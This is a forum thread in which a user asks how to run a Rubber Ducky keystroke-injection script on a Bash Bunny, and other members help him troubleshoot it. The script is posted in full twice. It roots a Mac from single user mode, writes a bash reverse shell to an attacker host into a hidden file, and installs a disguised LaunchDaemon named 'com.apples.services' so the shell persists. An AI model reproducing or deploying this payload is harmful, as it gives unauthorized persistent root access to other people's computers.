valentino00776 Posted March 13, 2017 Posted March 13, 2017 Can someone please explain how you use Ducky code txt to Bash Bunny Step by step would be appreciated Thanks Quote
valentino00776 Posted March 13, 2017 Author Posted March 13, 2017 example How would i get this to work on BashBunny REM Patrick Mosca REM A simple script for rooting OSX from single user mode. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ DELAY 1000 STRING mount -uw / ENTER DELAY 2000 STRING mkdir /Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > /Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x /Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir /Library/LaunchDaemons ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>/Library/.hidden/connect.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>StartInterval</key> ENTER STRING <integer>60</integer> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 500 STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 200 STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist ENTER DELAY 1000 STRING shutdown -h now ENTER Quote
LowValueTarget Posted March 13, 2017 Posted March 13, 2017 Check out the `QUACK` command http://wiki.bashbunny.com/#!index.md Quote
valentino00776 Posted March 13, 2017 Author Posted March 13, 2017 Hey buddy Thanks for your reply I've looked but still cant get it to work Can you PLEASE give example Thank you Quote
n00shE Posted March 13, 2017 Posted March 13, 2017 Just put Q in front of ever single line and rename to payload.txt. Then place in the switch folder you want to run it in. Quote
SRG Posted March 13, 2017 Posted March 13, 2017 Easiest way both for maintenance as well as for actual use is to put your script as is into a file. Say ducky.txt. Then do: QUACK ducky.txt Otherwise, if you want it inline, just put QUACK in front of each line. 1 Quote
valentino00776 Posted March 13, 2017 Author Posted March 13, 2017 Did this and still dont work Any Ideas guys please what am i missing ???? #!/bin/bash LED R ATTACKMODE HID LED R G QUACK DELAY 1000 QUACK STRING mount -uw / QUACK ENTER QUACK DELAY 2000 QUACK STRING mkdir /Library/.hidden QUACK ENTER QUACK DELAY 200 QUACK STRING echo '#!/bin/bash QUACK ENTER QUACK STRING bash -i >& /dev/tcp/192.168.1.55/4444 0>&1 QUACK ENTER QUACK STRING wait' > /Library/.hidden/connect.sh QUACK ENTER QUACK DELAY 500 QUACK STRING chmod +x /Library/.hidden/connect.sh QUACK ENTER QUACK DELAY 200 QUACK STRING mkdir /Library/LaunchDaemons QUACK ENTER QUACK DELAY 200 QUACK STRING echo '<plist version="1.0"> QUACK ENTER QUACK STRING <dict> QUACK ENTER QUACK STRING <key>Label</key> QUACK ENTER QUACK STRING <string>com.apples.services</string> QUACK ENTER QUACK STRING <key>ProgramArguments</key> QUACK ENTER QUACK STRING <array> QUACK ENTER QUACK STRING <string>/bin/sh</string> QUACK ENTER QUACK STRING <string>/Library/.hidden/connect.sh</string> QUACK ENTER QUACK STRING </array> QUACK ENTER QUACK STRING <key>RunAtLoad</key> QUACK ENTER QUACK STRING <true/> QUACK ENTER QUACK STRING <key>StartInterval</key> QUACK ENTER QUACK STRING <integer>60</integer> QUACK ENTER QUACK STRING <key>AbandonProcessGroup</key> QUACK ENTER QUACK STRING <true/> QUACK ENTER QUACK STRING </dict> QUACK ENTER QUACK STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist QUACK ENTER QUACK DELAY 500 QUACK STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist QUACK ENTER QUACK DELAY 200 QUACK STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist QUACK ENTER QUACK DELAY 1000 QUACK STRING shutdown -h now QUACK ENTER LED R Quote
GermanNoob Posted March 13, 2017 Posted March 13, 2017 @valentino00776 What exactly doesn't work? Have you run the DuckyInstall payload? Quote
valentino00776 Posted March 13, 2017 Author Posted March 13, 2017 it works with rubber ducky but cant get it to run on the Bashbunny The light goes red and green but no keystrokes Quote
Cpt.Pickles Posted March 13, 2017 Posted March 13, 2017 Have you attempted a "helloworld" script to even know if your BB is set up to GermanNoobs point??? That is the first step... Quote
GermanNoob Posted March 13, 2017 Posted March 13, 2017 41 minutes ago, valentino00776 said: it works with rubber ducky but cant get it to run on the Bashbunny The light goes red and green but no keystrokes @valentino00776 This answers my question 1... What about answering question 2? Quote
valentino00776 Posted March 13, 2017 Author Posted March 13, 2017 Ive tried nscan payload and that works Im so sorry GermanNood , whats duckyinstall payload ? Sorry for my lack of knowledge Even got a wifi nano never used for 9 months lol Quote
GermanNoob Posted March 13, 2017 Posted March 13, 2017 11 minutes ago, valentino00776 said: Ive tried nscan payload and that works I don't know that payload... Where did you get it from? Or did you mean nmapper? Most probably the payload you tested doesn't use the QUAK command... 12 minutes ago, valentino00776 said: Im so sorry GermanNood , whats duckyinstall payload ? As you don't know it I assume you haven't installed it and therefore it is most probably the reason why QUAK doesn't work... Copy the duckyinstall payload from library to one of the switches and run it. After it succeeded test again your original script... Quote
valentino00776 Posted March 13, 2017 Author Posted March 13, 2017 Yes sorry nmapper I try you suggestion and let you know Really appreciate your time and help buddy Quote
valentino00776 Posted March 13, 2017 Author Posted March 13, 2017 just looking at the payload Do i need to unzip it and run it somewhere (on a different pc )? what di i actually install and how I know getting embarrassing to ask Quote
illwill Posted March 13, 2017 Posted March 13, 2017 (edited) Violation of CoC Edited October 8, 2017 by illwill Violation of CoC Quote
valentino00776 Posted March 13, 2017 Author Posted March 13, 2017 Hey illwill thanks But what do you mean ???? can you show me an example or use what ive posted to show me ?? Thank you Quote
GermanNoob Posted March 13, 2017 Posted March 13, 2017 19 minutes ago, valentino00776 said: just looking at the payload Do i need to unzip it and run it somewhere (on a different pc )? what di i actually install and how I know getting embarrassing to ask You don't have to unzip anything... just move everything to the switch folder and go for it. What you are going to install? Just read the readme.txt! Quote DuckToolkit installer for Bash Bunny. Adds support for new languages. and uses the Ducktoolkit python library for encoding. Version 1.0.0 Moves the libary files to /tools Update Q and QUACK to point to the new library Writes error to /root/ducky.log Purple Blinking.................Moving tools Purple Solid....................Tools moved Amber Blinking..................Setup tools Red Solid.......................Tool installation failed White Solid.....................Installation completed successfully Quote
valentino00776 Posted March 13, 2017 Author Posted March 13, 2017 Ok so i copied duckyinstall on switch 1 , plugged it in and it has a install log saying installed. I then copied my payload .txt to switch 2 and tried it with the quake commands on every line but still nothing. My hair is going grey LOL Quote
valentino00776 Posted March 13, 2017 Author Posted March 13, 2017 Install log Install Log: ---------------- Found /root/udisk/payloads/switch1/DuckToolkit-1.0.1.tar.gz Copying files to target dir Move Complete Update Q Update QUACK Quote
GermanNoob Posted March 13, 2017 Posted March 13, 2017 (edited) just to be sure: is it named "payload .txt" or "payload.txt"? And please try a simple "hello world" payload... In your script I'm missing opening a terminal or similar... And post that script also... Edited March 13, 2017 by GermanNoob Quote
valentino00776 Posted March 13, 2017 Author Posted March 13, 2017 This worked #!/bin/bash ATTACKMODE HID LED R G QUACK DELAY 3000 QUACK GUI r QUACK DELAY 500 QUACK STRING notepad QUACK DELAY 500 QUACK ENTER QUACK DELAY 750 QUACK STRING Hello World!!! QUACK ENTER Quote
valentino00776 Posted March 13, 2017 Author Posted March 13, 2017 the original script is done on a mac in single user mode which terminal is already open it just wont type any of the commands. runs great with Rubber Ducky Quote
GermanNoob Posted March 13, 2017 Posted March 13, 2017 Congratulations! So now its only something about your script... 4 hours ago, valentino00776 said: #!/bin/bash LED R ATTACKMODE HID LED R G QUACK DELAY 1000 QUACK STRING mount -uw / QUACK ENTER You simply begin to quack commands without having opened a terminal or anything to write in... Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.